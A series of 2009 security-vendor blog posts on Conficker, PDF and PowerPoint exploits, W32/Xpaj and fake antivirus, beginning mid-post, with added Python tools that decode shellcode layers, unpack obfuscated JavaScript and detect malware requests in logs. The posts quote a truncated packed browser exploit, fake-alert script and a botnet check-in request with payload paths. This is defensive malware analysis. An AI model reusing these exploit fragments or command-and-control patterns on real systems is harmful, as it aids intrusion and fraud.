And to finish the day there was the Phonoelit Party at c-base, featuring Mumpi, Vela, and Illo. Another great event!

Of course, this selection is just my personal preference. Make sure to check the schedule for talks that interest you. ;)

Conficker Again in the News, Part 2

Yesterday, my colleague Dave Marcus quoted for you the new graphs and stats posted by Shadowserver. Indeed, since November 2008, W32/Conficker (alias Downup, Downadup, Kido) has frequently made headlines. This computer worm has five main variants, which have appeared during the last year. Wikipedia lists the dates: 

  • A variant: First appeared 21 November 2008
  • B variant: First appeared 29 December 2008
  • C variant: First appeared 20 February 2009
  • D variant: First appeared 4 March 2009
  • E variant: First appeared 7 April 2009 (self-destruction on 3 May 2009)

W32/Conficker spreads via the Windows AutoRun feature, drive sharing, and Microsoft vulnerabilities. At the end of 2008, the A and B versions took advantage of a newly discovered Windows Remote Procedure Call service vulnerability (MS08-067). That’s how Conficker’s masters created a large botnet involving one million unique IPs on a daily basis. The worm used a date-based algorithm to generate 250 domains per day under generic top-level domains. Infected machines then attempted to contact one of these domains in order to install specific malware.

In a similar manner, hosts infected with the C variant generated 50,000 unique URLs ending with a country-code top-level domain and attempted to connect to the first URL that was ready to distribute a digitally signed payload. This third variant also contained peer-to-peer functionality.

The D and E variants were not so prolific; they helped spread the C version as well as other malware (W32/Waledec) and fake anti-virus software.

Estimating the size of the Conficker population is almost impossible. In January, a 10-million hosts figure was frequently quoted in the media. McAfee announced one million unique IPs were alive (or online) each 24 hours, while another security company claimed that at least one out of every 16 PCs worldwide was infected. In March another source said that more than 35 million unique IPs had been botnet zombies since November 2008.

Today the A, B, and C variants maintain a huge foothold worldwide. In October, researchers estimated the number of systems infected topped seven million. Following Dave’s advice, I visited the new Shadowserver statistics page. To illustrate the extent of how this malware affects the world, the organization monitored the Autonomous System Number blocks that have at least one Conficker IP in their network space. The charts highlight the widespread infection and propagation as well as the ratio of infected IP addresses for each autonomous system block.

Shadowserver names 183 country codes and 5994 autonomous systems with Conficker IPs in their network space:

  • 1086 for the Russian Federation (RU)
  • 597 for the United States (US)
  • 422 for Ukraine (UA)
  • 271 for Romania (RO)
  • 244 for Brazil (BR)
  • 243 for Republic of Korea (KR)
  • 184 for Poland (PL)
  • 166 for Bulgaria (BG)
  • 147 for Europe (EU)
  • 129 for Indonesia (ID)
  • 113 for Japan (JP)
  • 95 for China (CN)
  • 94 for India (IN)

You can also find a Top 500 list for the autonomous systems hosting the largest number of infected IPs as well as the percentage of their entire routed space that is affected by the worm. CHINANET and CHINA169 take the top positions, but with only 1.1 percent and 1.2 percent of unique aggregate IPs. In the 420th position, we discover that 26.36 percent of CHILE S.A.’s routed space is affected by the worm.

If you want to know how your autonomous systems or your country-code top-level domain are positioned, check out the Shadowserver website.

We don’t really know the objectives of Conficker attacks, even though we can guess the motivations are financial. The consensus in the security community is that it was created to make botnets for hire. The botnet can be rented to criminals who want to send spam, distribute rogue spyware products, steal credentials, and direct users to online scams and phishing sites.

In May, Mike Steward from the Canadian Internet Registration Authority suggested that in the worst case Conficker could become a powerful cyberwarfare weapon that could disrupt not just countries, but the Internet itself.

Conficker Again in the News

Our good friends at Shadowserver have recently added some excellent graphs and stats that highlight the continued infections and propagation by the Conficker worm.

Conficker, although it actually does very little, continues to be a major annoyance worldwide, so let’s use these excellent charts and graphs as a reason to revisit two important points:

  • Update your systems to current patch levels
  • Use up-to-date and properly configured security software. Deploy these at a variety of levels whenever possible. (Layers of defense work better than a single solution.)

Take these two steps and you will be protected against Conficker and a whole lot more. Threats are complex, and combating them really does take layers of defense along with appropriate security technologies. In this age of “blended” and “Web 2.0” threats, it is wise to incorporate host IPS, network IPS, reputational technologies, and cloud technologies.

The bad guys are always looking for new ways to make their malware and attacks more successful. The good news is we are always working on new technologies to make them less successful.

Another Adobe Reader Zero-Day Attack

Adobe just posted a new Security Advisory (APSA09-07, CVE-2009-4324) for the latest critical vulnerability in Adobe Reader and Acrobat 9.2 (and earlier). The flaw lies within a JavaScript function specific to the PDF Reader. Adobe plans to release a patch by January 12, 2010, to resolve the issue. The zero day is already being exploited in targeted attacks. A Twitter post indicates that an exploit module has been added to the Metasploit framework as well, so it’s only a matter of days until this exploit becomes widespread–as the various exploit toolkits are “enhanced” with support for this latest vulnerability.

The screenshot below illustrates the inner workings of one such malicious PDF file, showing the JavaScript obfuscation layer on top of the actual exploit code.

McAfee FileInsight screenshot

McAfee customers are protected through both the DATs (as “Exploit-PDF.ag” in 5834) and through Gateway Anti-Malware (“BehavesLike.PDF.Suspicious.Z”). If you don’t really need JavaScript in PDF documents (and if you do, please leave a comment to this blog–we’re curious to know), you can mitigate this issue until the patch is available next year by disabling JavaScript in Adobe Reader and Acrobat as described in the Adobe Security Advisory.

Malicious Java Applet Poses as Carrie Prejean Video

McAfee Labs has observed various spam runs exploiting the recent sensational Carrie Prejean news. The Prejean video is rapidly becoming one of the most searched-for topics ever on the net since the existence of the tape became common knowledge.

Source: Google Trends

Java applets provide everything from interactive features to web applications to advertisements. Since the birth of Java, attackers have exploited its security platform. Attackers are now taking advantage of a Java feature to social-engineer less tech-savvy Internet users into infecting themselves with malware.

Here’s how an attack works:

  • The bad guys spam a link claiming to be the Carrie Prejean video
  • Then they trick victims into visiting a malicious website, which prompts users into running a Java applet to view the video

A signed applet carries a signature that the browser should verify against a remote, independent certificate authority. Once the signature is verified and the user also approves, the signed applet gains more rights, becoming equivalent to an ordinary application. When the applet is injected into a trusted website, users will hardly take the trouble to check whether the certificate is legitimate.

  • At this point, the applet runs in the browser, which in turn downloads a malicious executable that launches itself on the victim’s machine

This approach is very effective for the following reasons:

  • It’s easier to social-engineer users, as many rich multimedia applications use Java
  • Unlike spammed links that contain a cocktail of exploits or a zero-day attack, this approach exploits the applet’s design
  • The attack is independent of browser type and version
  • The attack works on a machine with the latest version of Java, which makes the exploit all the more dangerous

The malicious applet has almost no detection on VirusTotal, but it is detected by McAfee with the current DATs as Exploit-ByteVerify.b. The malicious executable incorporates SMTP functionality that is capable of sending spam and is currently detected as BackDoor-EHP.

We urge users to handle unknown Java applets with caution and make sure any digital signature comes from a trusted authority before executing it.

Latest PDF Zero Day Leads to Exploit Egg Hunt

Client-side exploitation continues to be a popular attack vector. Another zero-day attack has targeted Adobe Acrobat Reader to infiltrate customer networks. The currently unpatched exploit opens the door to code execution when a victim simply reads a malicious PDF document.

The exploit’s JavaScript code is viewable only once the stream has been unpacked, as can be seen in this FileInsight screenshot:

Although the content of the compressed stream may look like random data, when unpacked the JavaScript code fills a certain memory area with malicious x86 assembly code and causes the exploited Adobe software to execute this shellcode–a technique commonly known as a heap spray.

To determine the final intent of the shellcode, we have to remove another obfuscation layer that attempts to evade automated detection. The machine code is embedded as a “malformed” and “escaped” sequence of hex bytes. Any occurrence of the substring “XX” is replaced with “%u” before JavaScript can convert the string back into binary, executable code.

After loading it into a disassembler, we can see that the unescaped executable code is stage one of a two-stage attack. The intent of stage one is to identify the open file handle of the malicious PDF and find a particular signature (which exploit writers call an egg). This signature (0x0A666F65 in this example) is immediately followed by stage two of the shellcode, which is then branched into.

The screenshot below shows the presence of the PDF’s embedded egg, followed by x86 machine code, part of stage 2. The code contains another obfuscation layer, namely a routine that XOR decodes the remaining code and–surprise, surprise–unveils an embedded executable!

The hidden executable, which is visible only in a hex editor after having applied the same XOR decoding, is written to disk and executed by the shellcode–thus highlighting the steps the attacker has taken to evade detection.
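As an added example (not code from the post or from McAfee), the Python below reverses the layers the post walks through, on a constructed sample rather than the real PDF: the “XX” → “%u” substitution and JavaScript unescape(), locating the egg, splitting off the stage-two decoder stub, and XOR-decoding the remainder down to the embedded executable. The little-endian egg comparison, the XOR key, the stub length and the sample bytes are assumptions; the egg value itself is the one the post quotes.

```python
import re
import struct

# Egg value quoted in the post. Assumption for this example: the hunter compares
# it as a 4-byte little-endian dword, the usual way a 32-bit tag sits in memory
# (in that byte order 0x0A666F65 happens to read as the ASCII bytes "eof\n").
EGG = 0x0A666F65
EGG_TAG = struct.pack("<I", EGG)

_UNIT = re.compile(r"%u([0-9a-fA-F]{4})")


def decode_xx_escaped(s: str) -> bytes:
    """Undo the 'XX' -> '%u' substitution described in the post, then emulate
    JavaScript unescape() on the %uHHHH units: each unit is one 16-bit value,
    stored little-endian when the string is sprayed into memory."""
    s = s.replace("XX", "%u")
    if not re.fullmatch(r"(?:%u[0-9a-fA-F]{4})+", s):
        raise ValueError("not a pure %u-escaped sequence")
    return b"".join(struct.pack("<H", int(h, 16)) for h in _UNIT.findall(s))


def find_egg(data: bytes, tag: bytes = EGG_TAG) -> int:
    """Offset of the first byte after the egg (where stage two begins), or -1."""
    i = data.find(tag)
    return -1 if i < 0 else i + len(tag)


def xor_decode(blob: bytes, key: int) -> bytes:
    """Single-byte XOR as used by the stage-two decoder; XOR is its own inverse."""
    return bytes(b ^ key for b in blob)


def carve_executable(decoded: bytes):
    """Return the embedded executable from its 'MZ' header onward, or None."""
    i = decoded.find(b"MZ")
    return None if i < 0 else decoded[i:]


def recover_stage2(pdf: bytes, key: int, stub_len: int):
    """Locate the egg in the PDF bytes, split off the plain decoder stub that
    follows it, and XOR-decode the rest. Returns (stub, decoded) or None.
    Key and stub length are per-sample values read out of the disassembly;
    here both are constructed."""
    off = find_egg(pdf)
    if off < 0:
        return None
    stub = pdf[off:off + stub_len]
    return stub, xor_decode(pdf[off + stub_len:], key)


# --- Constructed sample (not the real malicious PDF) -----------------------
KEY = 0x5A                      # constructed XOR key
STUB = b"STUB"                  # stands in for the stage-two decoder routine
PAYLOAD = b"MZ\x90\x00\x03\x00" + b"constructed fake PE image"
SAMPLE_PDF = (
    b"%PDF-1.4\n1 0 obj<</Type/Catalog>>endobj\n"
    + EGG_TAG + STUB + xor_decode(PAYLOAD, KEY)   # egg, stub, encoded stage two
    + b"\n%%EOF"
)

if __name__ == "__main__":
    stage1 = decode_xx_escaped("XX9090XX50E8XX0000")
    print("stage one bytes:", stage1.hex())
    stub, decoded = recover_stage2(SAMPLE_PDF, KEY, len(STUB))
    print("embedded executable header:", carve_executable(decoded)[:6])
```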

McAfee Gateway Anti-Malware detected and blocked this threat proactively (“BehavesLike.PDF.Suspicious” and the embedded executable as “BehavesLike.Win32.Rootkit.H”). McAfee Artemis and the 5766 DATs block it, as well.

Update (late October 13, 2009):

Adobe has released a patch that remediates the above issue. Full details available here.

McAfee Labs and the International Spy Museum

Surrounded by a network of neon lights across the ceiling, walls of computer screens lit with grave headlines regarding our country’s digital dependence–drinking water, sewer systems, banks, government systems, all vulnerable to an electrical grid outage–I introduced my wife and my sixteen-year-old daughter to our latest McAfee endeavor: contributing to the new International Spy Museum exhibit “Weapons of Mass Disruption.”

Yes, you read that correctly. Your humble narrator is part of a museum exhibit.

Nestled on the corner of 8th and F Streets in Washington, D.C., the International Spy Museum has become a must-see in our nation’s capital. It speaks to our country’s tales of espionage and the ultimate currency, intelligence. Never has a place been better suited to educate its visitors about the cybersecurity threats facing our government, our businesses, and you and me.

As former national intelligence director Admiral Michael McConnell mentioned during the exhibit’s opening event, the Internet has created an unprecedented level of vulnerability.

These threats, which could bowl you over in their magnitude and frequency, are constantly evolving, morphing into ever-changing but equally lethal pieces of malware–as diverse and fluid as Web 2.0 itself. In the thick of all that is our office, littered with Red Bull and Twinkies, where I and many other McAfee Labs researchers gain an understanding of the dark side of cyberspace activity. You know the saying: Keep your friends close but your enemies closer. It is this insight that yields information on breaking threats and a more holistic understanding of the black-hatted enemy.

So consider again the computer wall’s grave headlines in the exhibit: “The Pentagon’s IT system is probed 360 million times a day. Twitter crashed as a result of a denial of service attack against a Georgian proponent. Is our air traffic control system protected?”

The exhibit shouts the theme that we as an industry live and that I shared during my contribution interview. The threat is real. Even my daughter got a kick out of it.

W32/Xpaj Botnet Growing Rapidly

Two weeks ago I blogged about a new virus–W32/Xpaj–found in the wild by McAfee researchers and actively spreading around the world. Since then we have closely monitored the change in spread and severity of the virus, improved generic detection for future W32/Xpaj instances, and added cleaning and proper repair for all the files infected by the virus. Today I want to share more news related to this threat.

Further analysis has revealed some interesting details about the malicious behavior of W32/Xpaj. The virus is building a widespread “zombie” network by taking control of thousands of Internet-connected computers. The new botnet is in its infancy, although thousands of machines have been infected during the last two weeks. The botnet infects computers around the world and has spread across many countries. The attacks are mostly aimed at enterprises, but they have now spread to consumer machines as well. Based on multiple characteristics and our own research, the virus is most probably the work of eastern European cybercriminals.

Most bots are connected to a central location from where one machine can control the entire botnet. W32/Xpaj, on the other hand, deploys several control channels to communicate and control its bots. It employs the same techniques used by Srizbi and Conficker; that is, it uses randomly generated DNS names for backup control servers. Even though W32/Xpaj does not know where the control server is, it knows how to search for it, making it possible to predict which host is in use on a given day.

To prevent botnet hijacking, W32/Xpaj accepts only digitally signed payloads and commands. The malware authors use a cryptographic hash (the MD5 algorithm) to validate the authenticity of any payload received from the control server.

Our analysis has not revealed any cryptographic system protecting the payload, so there is a chance for a rival to take control of the entire botnet.

The W32/Xpaj variants we analyzed use a sophisticated domain-generation algorithm to create and query the list of random domains starting on September 24. The virus first tries to resolve the domain name to an IP address. If that succeeds, it sends an HTTP request in the form of a string:

/GET /up.php?a=g2&cm=15A91F71

The malicious host responds with the path to a binary containing further instructions and code to be executed:

http://[infected]/stamm/stamm.dat

http://[infected]/plugin/plugin.dat

The first binary containing malicious instructions has already been received by all W32/Xpaj-infected machines. The virus stores the downloaded encrypted binary in the Windows folder. After decryption, the malicious code executes and instructs the virus to gather information about the infected machine and report to the server, sending the victim’s IP address, machine name, host process, registry records, current home page, and even fonts and path variables.

Every time an infected machine receives a payload and executes malicious code, a marker (a file with a random name) is created in the Windows folder, preventing the virus from executing the same payload twice.
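The check-in request and the two payload paths quoted above are enough to build a log-based detection. The following is an added example (not McAfee’s or the post’s code) that runs those indicators over proxy or web-server access-log lines and then correlates them per client, treating a check-in followed by a .dat download as the full sequence the post describes. The log lines and the `.invalid` host names are constructed; the `a=` value and the 8-hex-digit `cm=` token follow the single example in the post.

```python
import re
from typing import Dict, List, Set
from urllib.parse import urlsplit

# Request shapes quoted in the post; the a= value and 8-hex cm= token follow the
# one example given there (a=g2&cm=15A91F71).
INDICATORS = {
    "xpaj-checkin": re.compile(r"^/up\.php\?a=\w+&cm=[0-9A-Fa-f]{8}$"),
    "xpaj-stamm":   re.compile(r"^/stamm/stamm\.dat$"),
    "xpaj-plugin":  re.compile(r"^/plugin/plugin\.dat$"),
}

# Common/combined log format prefix: client ident user [time] "METHOD URL PROTO" status
_LOG = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)


def classify(path_and_query: str):
    """Name the W32/Xpaj indicator a request path matches, or None."""
    for name, rx in INDICATORS.items():
        if rx.match(path_and_query):
            return name
    return None


def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Run the indicators over log lines. The URL may be absolute (forward-proxy
    logs) or a bare path (origin-server logs); both are handled."""
    hits = []
    for line in lines:
        m = _LOG.match(line)
        if not m:
            continue
        u = urlsplit(m["url"])
        pq = u.path + ("?" + u.query if u.query else "")
        tag = classify(pq)
        if tag:
            hits.append({"client": m["client"], "time": m["ts"],
                         "host": u.netloc, "indicator": tag, "request": pq})
    return hits


def infected_clients(hits: List[Dict[str, str]]) -> Set[str]:
    """Clients that both checked in and fetched a .dat payload: the full sequence
    the post describes, which is far stronger evidence than either hit alone."""
    by_client: Dict[str, Set[str]] = {}
    for h in hits:
        by_client.setdefault(h["client"], set()).add(h["indicator"])
    return {c for c, tags in by_client.items()
            if "xpaj-checkin" in tags and tags & {"xpaj-stamm", "xpaj-plugin"}}


# Constructed log lines; control-server hosts use the reserved .invalid TLD.
SAMPLE_LOG = [
    '10.0.0.7 - - [29/Sep/2009:10:01:02 +0000] "GET http://c2-placeholder.invalid/up.php?a=g2&cm=15A91F71 HTTP/1.1" 200 64',
    '10.0.0.7 - - [29/Sep/2009:10:01:05 +0000] "GET http://c2-placeholder.invalid/stamm/stamm.dat HTTP/1.1" 200 40960',
    '10.0.0.9 - - [29/Sep/2009:10:02:11 +0000] "GET http://www.example.com/index.html HTTP/1.1" 200 1234',
    '10.0.0.12 - - [29/Sep/2009:10:03:00 +0000] "GET http://cdn.example.org/plugin/plugin.js HTTP/1.1" 200 512',
    '10.0.0.12 - - [29/Sep/2009:10:03:30 +0000] "GET /up.php?a=g2&cm=zz HTTP/1.1" 404 0',
    '10.0.0.15 - - [29/Sep/2009:10:04:00 +0000] "GET /plugin/plugin.dat HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(h)
    print("likely infected:", infected_clients(scan_log(SAMPLE_LOG)))
```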

Botnets grow and evolve quickly. We measure them by the number of compromised computers under their control. However, proactive virus detection and following these simple recommendations will help prevent your computer from becoming a part of a botnet:

  • Keep your anti-virus software up to date
  • Apply all the latest security patches and keep your operating system up to date
  • Set up a firewall to block unauthorized access while you are connected to the Internet. Use strict firewall policies and allow only those connections–both incoming and outgoing–that are absolutely necessary for your business.

Although many security vendors struggled to release new signatures and cleaning support for this virus, McAfee customers are already protected. You will hear a lot more from us in the coming months, so stay tuned and keep reading our blogs.

Thanks to Abhishek Karnik, Rachit Mathur, Di Tian, Ivan Teblin, and Adrian Dunbar for their help in analyzing and defeating this threat.

Malware Authors Profit From Disasters

McAfee Labs has discovered another attempt by ruthless malware authors to profit from disaster and tragedy.

While searching for information on the earthquakes and tsunami that struck the islands of American Samoa on 29 September, I saw the following results from the Google search engine:
Screenshot: Google search results

Clicking on one of the links, which at first sight seem to be legitimate, would result in my machine displaying an alert for a possible infection:
Screenshot: infection alert

What is actually happening behind the scenes of my browser (in this case Internet Explorer Version 8 on a patched Windows XP system) is that the link silently connects to a server hosted in Poland that loads an exploit obfuscated with the well-known Dean Edwards packer, which I covered in a blog last year.

This is a snippet of the exploit being loaded:

eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('28 61={"174":35,"295":35,"297":35,"614":35,"298":35,"233":-1,"272":"\\36\\21\\19\\36\\21\\19\\36\\36<!---->\\21\\19\\36\\36\\21\\19 \\21\\19 \\21\\19 \\36203 755\\21\\19 \\21\\19\\36\\36\\36752 131 461\\21\\19\\36\\36\\36754 726 282 645\\21\\19\\36\\36\\36787 13 795\\21\\19 \\21\\19\\36\\36\\21\\19 \\21\\19 \\21\\19 \\36796 576\\21\\19 \\21\\19\\36\\36\\36325 794 576\\21\\19\\36\\36\\36325 181\\21\\19\\36\\36\\36572 181\\21\\19\\36\\36\\36<17 31=
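The `function(p,a,c,k,e,d)` wrapper is the Dean Edwards packer. As an added example (not code from the post), here is a Python routine that undoes it statically, without evaluating any JavaScript: it extracts the four arguments from the `eval()` call, resolves the string escapes, and replays the packer’s whole-word token substitution. It handles both the simplified `e=function(c){return c}` variant seen above (decimal tokens, equivalent to base 10) and the classic base-36/62 encoder. The packed sample it runs on is constructed, not the exploit.

```python
import re
from typing import List

_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "b": "\b", "f": "\f", "v": "\v", "0": "\0"}


def js_unescape(s: str) -> str:
    """Resolve the backslash escapes of a single-quoted JavaScript string literal."""
    def repl(m):
        e = m.group(1)
        if e[0] in "xu":
            return chr(int(e[1:], 16))
        return _ESCAPES.get(e, e)      # \\ -> \, \' -> ', unknown escapes -> the char itself
    return re.sub(r"\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|.)", repl, s, flags=re.S)


def encode_token(c: int, a: int) -> str:
    """Port of the packer's e(): base-`a` digits using 0-9, a-z, then A-Z above 35.
    With a = 10 this is the identity on decimal numbers, matching the simplified
    e=function(c){return c} in the snippet above."""
    digit = c % a
    if digit > 35:
        ch = chr(digit + 29)
    elif digit >= 10:
        ch = chr(ord("a") + digit - 10)
    else:
        ch = str(digit)
    return (encode_token(c // a, a) if c >= a else "") + ch


def unpack(p: str, a: int, c: int, k: List[str]) -> str:
    """Replay the packer's dictionary pass: every whole word in p that equals
    encode_token(i) is replaced by k[i] when k[i] is non-empty (the packer's
    d[e(c)]=k[c] lookup). Pure string work; nothing is executed."""
    if len(k) != c:
        raise ValueError("dictionary length does not match c")
    table = {encode_token(i, a): k[i] for i in range(c) if k[i]}
    return re.sub(r"\b\w+\b", lambda m: table.get(m.group(0), m.group(0)), p, flags=re.ASCII)


# Matches the tail of eval(function(p,a,c,k,e,d){...}('…',a,c,'…'.split('|'),0,{}))
_CALL = re.compile(
    r"\}\('((?:[^'\\]|\\.)*)',(\d+),(\d+),'((?:[^'\\]|\\.)*)'\.split\('\|'\),\d+,\{\}\)\)",
    re.S,
)


def unpack_js(js: str) -> str:
    """Extract (p, a, c, k) from a packed eval() blob and return the unpacked source."""
    m = _CALL.search(js)
    if not m:
        raise ValueError("no recognisable packer call found")
    p = js_unescape(m.group(1))
    k = js_unescape(m.group(4)).split("|")
    return unpack(p, int(m.group(2)), int(m.group(3)), k)


# Constructed sample in the same shape as the snippet above (not the real exploit).
SAMPLE = (
    "eval(function(p,a,c,k,e,d){e=function(c){return c};/* body elided */return p}"
    r"('0 1=2(\'3\');4(1)',10,5,'var|msg|unescape|Warning|alert'.split('|'),0,{}))"
)

if __name__ == "__main__":
    print(unpack_js(SAMPLE))
```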

And this is a snippet of an interesting part of the unobfuscated version of the exploit:

{kPromo.alerts.minimizeWindow();alert("Warning! Your PC is at risk of virus and malware attack. \r\n \r\nYour system requires immediate check!\r\nSystem Security will perform a quick and free scan of your PC for viruses and malicious programs.");kPromo.alerts.maximizeWindow()};kPromo.alerts.showWindow=
function(e,c,b){if(!kPromo.instructions.property.isInstructionActive) if(kPromo.alerts.windows[e]==undefined){var a=(typeof(kPromo.alerts.windows.length)==undefined)?"alert_window_"+
kPromo.alerts.windows.length:"alert_window_0";
kPromo.alerts.windows[e]=kPromo.layouts.createLayer(a,c,b);kPromo.alerts.windows[e].foregroundContentLayer.appendChild
(kPromo.document.getDocumentElementByID(e));
kPromo.alerts.draggableItem.div=kPromo.alerts.windows[e].

The exploit in turn connects to a server hosted in China that downloads (with user interaction) an executable that turns out to be yet another variant of the fake anti-virus software Windows PC Defender. For details of that software, you can see a recently published VIL here.

After just a few minutes of the malware running, information such as the Windows Product ID and the Windows License Key on the system are sent to a server hosted in Russia.

Screenshot: system information being sent to the server

It’s amazing how fast and well-prepared malware authors are nowadays. They seize opportunities that arise to exploit not only our machines but also our trust and confidence in the news. They make use of well-known techniques (such as search-engine optimization) strengthened by people’s emotions toward world-wide tragic events that are followed by millions (who are themselves victims of a lesser tragedy).

Blast from the past: Fresh wave of targeted attacks using PowerPoint

The use of social engineering to grab recipients’ attention and deliver malware is nothing novel. The latest trend in spreading malware is to exploit a breaking celebrity story, disaster, or other high-profile news event. The threat can be delivered as email or as poisoned search-engine results that lead to malware. In the past, we have come across innumerable incidents, such as Michael Jackson’s death or Benazir Bhutto’s assassination, used as a vehicle to spread malware. Lately, we have observed an increase in the number of OLE files used in targeted attacks against various high-profile users.

The exploit arrives via email as a PowerPoint attachment, with a lure claiming to contain information on the Pakistani Air Force. When an unsuspecting user with a vulnerable version of PowerPoint opens the document, the vulnerability is exploited and the malicious payload is executed.

The vulnerability lies in the handling of a malformed record within PowerPoint, which can be exploited to execute malicious code. The shellcode uses the Process Environment Block (PEB) approach to determine the kernel32.dll base address, as shown in the figure below.

Upon executing the file in a vulnerable version of PowerPoint, the shellcode decrypts itself and executes the malicious binary.

The malicious PPT file exploits an older vulnerability that was patched by Microsoft in bulletin MS06-028. This attack is detected with the current DATs as Exploit-PPT.h, and the dropped malicious executable is detected as BackDoor-EFB.

Search-Engine Manipulation Evolves as Trust Abuse Grows

I revisited the topic of search-engine manipulation (a.k.a. blackhat SEO) in two recent posts. Something caught my eye while investigating cases of search-result poisoning–a shift away from tactics used by the attackers earlier in the year.

Previously, attackers mostly registered free websites to pull off their attacks. They would create a bunch of new sites, cross-link them, and use other tricks to get their pages indexed and ranked high on relevant search result pages (again, largely targeting the most popular search terms of the day, such as those found on Google Trends). I blogged earlier in the year about how the user forum on democrats.org was leveraged to link a high-ranking site with newly created malicious sites.

It seems now that attackers are combining various elements of different attacks to achieve blackhat SEO.

There are currently many examples of high-ranking poisoned results that lead to compromised legitimate sites. This is a bit different than in the past, as now security vulnerabilities are being exploited simply for the sake of search-engine manipulation. 

Historically we’ve seen attackers upload malicious content to compromised sites, either directly by injecting exploit code or indirectly by injecting an iframe or script that brings in exploit code from a remote site. Such situations can lead to site users notifying the compromised site’s administrator that they were attacked while visiting that site. Redirecting victims to a completely different site helps conceal the poisoned site.

The attackers go a step further by implementing a well-used trick: redirecting conditionally. It’s not enough for people to go to a compromised page; they must arrive there from a search-result page. In other words, users (or site admins) navigating to http://compromised-site.com/attacker_created_page will not be redirected to a payload site unless they are coming from a Google search-result page.
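Because the redirect fires only for visitors arriving from search results, a site owner browsing directly never sees it; the server’s own access log does, however, record both populations. As an added example (not code from the post), the Python below reads combined-format access-log lines and flags paths that answer search-referred visitors with a 3xx while serving everyone else a 2xx. The log lines are constructed (documentation-range IPs, example.com referers); accepting any Google country domain is an assumption beyond the post, which names Google only.

```python
import re
from collections import defaultdict
from typing import Dict, List, Set
from urllib.parse import urlsplit

# Combined log format: client ident user [time] "METHOD PATH PROTO" status bytes "referer" "agent"
_LOG = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# google.com, google.de, google.co.uk, google.com.br, ... (assumption: any country domain)
_GOOGLE = re.compile(r"^(www\.)?google\.(com|[a-z]{2}|com?\.[a-z]{2})$")


def is_search_referer(referer: str) -> bool:
    """True when the Referer is a Google search-result page, the trigger the post describes."""
    u = urlsplit(referer)
    return bool(_GOOGLE.match(u.netloc.lower())) and u.path.startswith(("/search", "/url"))


def find_conditional_redirects(lines: List[str]) -> List[str]:
    """Paths that redirect (3xx) search-referred visitors but serve normal content
    (2xx and never 3xx) to everyone else. A page that redirects everybody is an
    ordinary permanent redirect and is not reported."""
    buckets: Dict[str, Dict[str, Set[int]]] = defaultdict(lambda: {"search": set(), "other": set()})
    for line in lines:
        m = _LOG.match(line)
        if not m:
            continue
        key = "search" if is_search_referer(m["referer"]) else "other"
        buckets[m["path"]][key].add(int(m["status"]))
    flagged = []
    for path, b in buckets.items():
        search_redirects = any(300 <= s < 400 for s in b["search"])
        other_serves = (any(200 <= s < 300 for s in b["other"])
                        and not any(300 <= s < 400 for s in b["other"]))
        if search_redirects and other_serves:
            flagged.append(path)
    return sorted(flagged)


# Constructed access-log lines; the flagged path name is the one used in the post.
SAMPLE_LOG = [
    '198.51.100.4 - - [10/Sep/2009:08:00:01 +0000] "GET /forum/viewtopic.php?t=9 HTTP/1.1" 200 8120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Sep/2009:08:00:07 +0000] "GET /forum/viewtopic.php?t=9 HTTP/1.1" 200 8120 "http://www.example.com/" "Mozilla/5.0"',
    '203.0.113.21 - - [10/Sep/2009:08:01:15 +0000] "GET /attacker_created_page HTTP/1.1" 302 0 "http://www.google.com/search?q=celebrity+video" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Sep/2009:08:01:40 +0000] "GET /attacker_created_page HTTP/1.1" 200 4102 "-" "Mozilla/5.0"',
    '203.0.113.30 - - [10/Sep/2009:08:02:02 +0000] "GET /old-page.html HTTP/1.1" 301 0 "http://www.google.com/search?q=old" "Mozilla/5.0"',
    '198.51.100.5 - - [10/Sep/2009:08:02:10 +0000] "GET /old-page.html HTTP/1.1" 301 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print("conditional redirects:", find_conditional_redirects(SAMPLE_LOG))
```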

Some of the compromised sites are running older, vulnerable phpBB and WordPress applications. Other sites are serving attacker HTML pages, perhaps as a result of compromised admin/user credentials or misconfigured web servers.

These events further blur the line between “trusted” sites and malicious content. This trend is likely to continue for years to come.

Chinese Pharmacy Spam and Our Monthly Spam Report

The recent onslaught of “Chinese pharmacy” spam and the DDoS attacks that took down Twitter, Facebook, and others have caused a frenzy of speculation about the Chinese government’s involvement in spam generation and acts of cyberterrorism. McAfee’s September 2009 Spam Report debunks these rumors and gets to the root of the cause.

The report reveals the truth behind the “Chinese pharmacy” spam:

• “Chinese pharmacy” spam appears to be the result of a need for regional pharmaceutical companies to offload excess drugs internationally, as selling excess drugs inside the country violates Chinese law. We just don’t believe this month’s onslaught is a sinister government plot.
• Spam originating from China can often make up between 60 percent and 65 percent of today’s global email volume
• “Chinese newsletter” spam emails were the leading type of pharmaceutical spam, with a total of 52,428 emails that contained 1,235 unique URL domains in a single day
• If excess drugs in China cannot be sold into the legal market due to Chinese law, then they will continue to be sold on the black market

Furthermore, the report uncovers findings that have surfaced since the August 6 DDoS attacks:

• The August 6 spam campaign, launched in conjunction with the DDoS attacks, was not solely responsible for the downfall of the social networking sites and, in fact, was likely a mere afterthought of the attacker
• The August 6 DDoS and spam attack was intended to target a pro-Georgian blogger, and was likely part of an intimidation campaign in retaliation for his political blogs
• Brazil, Turkey, and India were among the top three domains from which infected machines spread the August 6 spam campaign in conjunction with the DDoS attack

Check out the full report here.

Remote BIND 9 DoS Vulnerability Patched

A new, remotely exploitable denial-of-service (DoS) vulnerability affecting BIND Version 9 was reported by ISC on July 28. It’s also reported that exploits have been seen in the wild.  Because BIND is widely used, these attacks can affect many critical infrastructures. Here’s a little description of the problem.

